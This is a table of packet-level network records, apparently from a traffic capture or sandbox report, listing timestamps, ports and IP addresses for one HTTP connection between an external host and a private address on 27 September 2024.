Sep 27, 2024 04:14:15.477539062 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.477550030 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.477560043 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.477576017 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.477591991 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.477591991 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.477617979 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.477679968 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.477689028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.477699995 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.477710009 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.477720976 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.477725983 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.477725983 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.477766991 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.477766991 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.477787971 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.477883101 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.477900028 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.477929115 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.477937937 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.477940083 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.477986097 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.478018999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478029013 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478039026 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478055000 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.478080034 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.478205919 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478219986 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478230953 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478240013 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478240967 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.478250027 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478260994 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478271961 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.478357077 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.478416920 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478427887 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478437901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478446960 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478454113 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.478522062 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.478626013 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478635073 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478643894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478653908 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478662968 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478671074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.478673935 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478683949 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478694916 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478702068 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.478703976 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478714943 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478724957 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478734016 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.478735924 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.478748083 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.478765011 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.478805065 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.478991032 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.479001045 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.479011059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.479031086 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.479034901 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.479041100 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.479049921 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.479053020 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.479060888 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.479070902 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.479079008 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.479082108 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.479091883 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.479115009 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.479115009 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.479149103 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.508892059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.508903980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.508914948 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.508965015 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.508980036 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.508991003 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.508996964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.508996964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509001970 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509013891 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509051085 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509051085 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509124994 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509136915 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509186983 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509186983 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509216070 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509227037 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509237051 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509247065 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509251118 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509258032 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509265900 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509311914 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509311914 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509407997 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509419918 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509430885 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509440899 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509445906 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509452105 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509462118 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509463072 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509506941 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509506941 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509830952 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509841919 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509851933 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509861946 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509871006 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509881020 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509891033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509901047 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509912014 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.509917021 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509917021 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509952068 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509953022 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.509987116 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.510001898 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.510036945 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.510036945 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.510081053 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.510092974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.510103941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.510122061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.510132074 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.510132074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.510132074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.510164976 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.510164976 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.510670900 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.510682106 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.510715961 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.510750055 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.568584919 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568595886 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568612099 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568623066 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568633080 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568645000 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568655968 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568689108 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568691015 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.568717957 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.568751097 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568768978 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.568795919 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568806887 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568809032 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.568845987 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.568845987 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.568890095 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568900108 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568909883 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568924904 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.568941116 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.568943024 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568953037 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568973064 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.568984985 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569014072 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569122076 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569175959 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569186926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569211960 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569211960 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569232941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569243908 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569266081 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569266081 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569308996 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569319963 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569329023 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569344997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569344997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569374084 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569456100 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569499969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569509983 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569521904 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569542885 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569592953 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569602966 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569612980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569623947 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569627047 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569633961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569681883 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569681883 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569741964 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569752932 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569763899 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569778919 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569782019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569802046 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569818020 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.569947004 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569957018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569967031 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569976091 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.569986105 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570117950 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570118904 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570118904 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570188999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570240974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570251942 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570349932 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570359945 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570369005 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570369005 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570369005 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570370913 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570382118 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570394993 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570394993 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570436001 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570497990 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570508957 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570545912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570545912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570568085 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570579052 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570589066 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570606947 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570622921 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570633888 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570645094 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570653915 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570662975 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570672989 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570672989 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570678949 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570684910 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570692062 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570708036 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570744991 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570858002 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570919991 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570940018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570949078 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570960999 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570969105 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.570976019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.570993900 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.571010113 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.571194887 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571204901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571216106 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571224928 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571234941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571244001 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571245909 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.571245909 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.571255922 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571265936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571275949 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571285963 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571290970 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.571290970 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.571296930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571305037 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.571306944 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571317911 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571352959 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.571399927 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.571558952 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571569920 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571614981 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.571614981 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.571698904 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571710110 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571719885 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571731091 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571736097 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.571742058 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571752071 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.571770906 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.571770906 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.571825027 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.601294994 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601309061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601325989 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601336956 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601349115 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601383924 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601393938 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601398945 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.601398945 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.601406097 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601414919 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601422071 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.601480961 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.601516962 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601525068 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601535082 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601547956 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601556063 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601562023 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.601567984 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601578951 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601593971 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.601630926 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.601632118 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.601784945 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601797104 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601807117 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601816893 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601820946 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.601828098 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601838112 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601838112 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.601865053 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601876020 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601881981 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.601881981 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.601910114 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.601933956 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.601943970 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.602000952 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.602000952 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.602153063 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.602161884 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.602193117 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.602200985 CEST	80	49704	185.215.113.37	192.168.2.5
